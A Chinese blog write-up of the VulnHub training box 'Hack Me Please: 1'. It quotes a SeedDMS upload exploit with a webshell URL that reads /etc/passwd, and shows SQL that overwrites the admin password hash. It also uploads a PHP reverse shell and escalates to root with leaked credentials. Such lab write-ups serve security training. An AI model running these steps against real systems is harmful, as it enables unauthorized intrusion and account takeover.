• vulnhub刷题记录(Hack Me Please: 1)


    • 英文名称:Hack Me Please: 1
    • 中文名称:请黑我:1
    • 发布日期:2021 年 7 月 31 日
    • 难度:容易
    • 描述:一个完全为 OSCP 制作的简单盒子。不需要蛮力。目标:获取root shell
    • 下载地址https://www.vulnhub.com/entry/hack-me-please-1,731/

    1、开机(Ubuntu_CTF)

    dce678f92b54f177850c752d1ab4fde4.png
    开机

    2、主机发现(192.168.199.109)

    932ff2359e4d7826a25389f77ad81197.jpeg
    主机发现

    3、端口扫描(80、3306)

    989f8547915b61ca93bed1f894d6c01f.jpeg
    端口扫描

    4、web首页

    1. Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker."
    2. -Emmanuel Goldstein
    3. 大多数黑客都很年轻,因为年轻人往往适应能力强。 只要你保持适应能力,你就永远可以成为一名优秀的黑客。
    4. ——伊曼纽尔·戈德斯坦

    96d5d5bda5ebe1a84945cf56e193cf8f.jpeg
    web首页

    5、查看源代码,在js注释中找到线索

    cf862d87efe51381092bc9cb77cbe1b7.jpeg
    查看源代码

    6、访问页面

    c5831bf2b3a7d41415557930e66f1f9e.jpeg
    访问页面

    7、查找漏洞

    searchsploit SeedDMS 

    0ef84f99274c7a9ef0e56c93aeabd1fb.jpeg
    查找漏洞

    8、查看漏洞简介

    发现需要登录之后,才能利用文件上传漏洞

    1. ─# find / -name "47022.txt" 2>/dev/null
    2. /usr/share/exploitdb/exploits/php/webapps/47022.txt
    3. Step 1: Login to the application and under any folder add a document.
    4. 登录到应用程序并在任何文件夹下添加一个文档。
    5. Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
    6. 选择文档作为简单的 php 后门文件,或者可以使用任何后门/webshell。
    7. Step 3: Now after uploading the file check the document id corresponding to the document.
    8. 现在上传文件后检查与文档对应的文档ID。
    9. Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
    10. 现在转到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在浏览器中获取命令响应。
    11. Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
    12. 注意:这里的“data”和“1048576”是保存上传文件的默认文件夹。

    9、在conf/settings.xml中发现mysql的用户名密码

    1. dbDatabase="seeddms"
    2. dbUser="seeddms"
    3. dbPass="seeddms"

    58a2dc7102b3e29ad125dc65bd7e7240.jpeg
    conf 目录

    10、登录mysql,查看web的用户名密码,发现登录不成功

    1. use seeddms;
    2. show tables;
    3. select * from users;
    4. +-------------+---------------------+--------------------+-----------------+
    5. | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
    6. +-------------+---------------------+--------------------+-----------------+
    7. | 1 | saket | saurav | Saket@#$1337 |
    8. +-------------+---------------------+--------------------+-----------------+

    46e70609b673988735e3fbcb068046fe.jpeg
    查看users表

    11、继续查看 tblUsers 表,找到admin的pwd

    2f51a06f200e247d48d3b97a9c4dcbb5.jpeg
    admin密码

    12、在线破解md5[1],快如闪电(undefined应该是解密失败,尴尬),发现还是无法登录

    undefined

    f3e330fc62d82ae765dbfa500d9810eb.jpeg
    破解md5

    13、篡改md5值

    1. └─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1
    2. 83b70504e0d8742dd5b66e6962eb8a35
    3. update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";
    4. select login,pwd from tblUsers;

    b14c12547d72c7e2e85fd73e1c00d223.jpeg
    篡改md5

    14、继续登录

    10dbee7c1a0022b3e7bcb1f18b0a289d.jpeg
    密码正确

    15、上传反弹shell

    使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本,使用kali自带的php反弹shell脚本

    1. └─# find / -name "php-reverse-shell.php" 2>/dev/null
    2. /usr/share/laudanum/php/php-reverse-shell.php
    3. /usr/share/laudanum/wordpress/templates/php-reverse-shell.php
    4. /tmp/mozilla_ailx100/php-reverse-shell.php

    8e09765c406bdde89e4a016c1bad8c6d.png
    kali自带的php反弹shell脚本

    48d42d36592ce643a430581b086a1c88.jpeg
    修改IP地址和端口

    1cede296f539fe447b1cc4113310a161.jpeg
    上传成功

    16、本地监听,再点击web页面的反弹shell

    cfa8e6eb519b22672c40888db55e5e50.jpeg
    反弹成功

    47ad67daadb1cd172d020cae99487c8b.jpeg
    最后文件名会被修改成 1.php

    17、切换用户,使用users表中的用户名密码,sudo获得root权限

    1. select * from users;
    2. +-------------+---------------------+--------------------+-----------------+
    3. | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
    4. +-------------+---------------------+--------------------+-----------------+
    5. | 1 | saket | saurav | Saket@#$1337 |
    6. +-------------+---------------------+--------------------+-----------------+

    b0fd1035b63e0834bdf1a55583574916.jpeg
    获得root权限

    到此,实验完成~

  • 相关阅读:
    Dubbo消费端调用全过程实现分析-负载均衡与集群容错
    6_显示登录信息以及上传图片
    后端接口对接注意事项
    2-3-4树【数据结构与算法java】
    java-net-php-python-ssm担保系统客户管理计算机毕业设计程序
    SQL优化复习
    创新洞察|为什么中国企业更擅长用户导向创新
    好奇喵 | PT(Private Tracker)——什么是P2P,什么是BT,啥子是PT?
    【科普】RPA技术架构:3大组成部分
    【附源码】计算机毕业设计JAVA超市自助结账系统的设计与实现
  • 原文地址:https://blog.csdn.net/admin_gt/article/details/126556810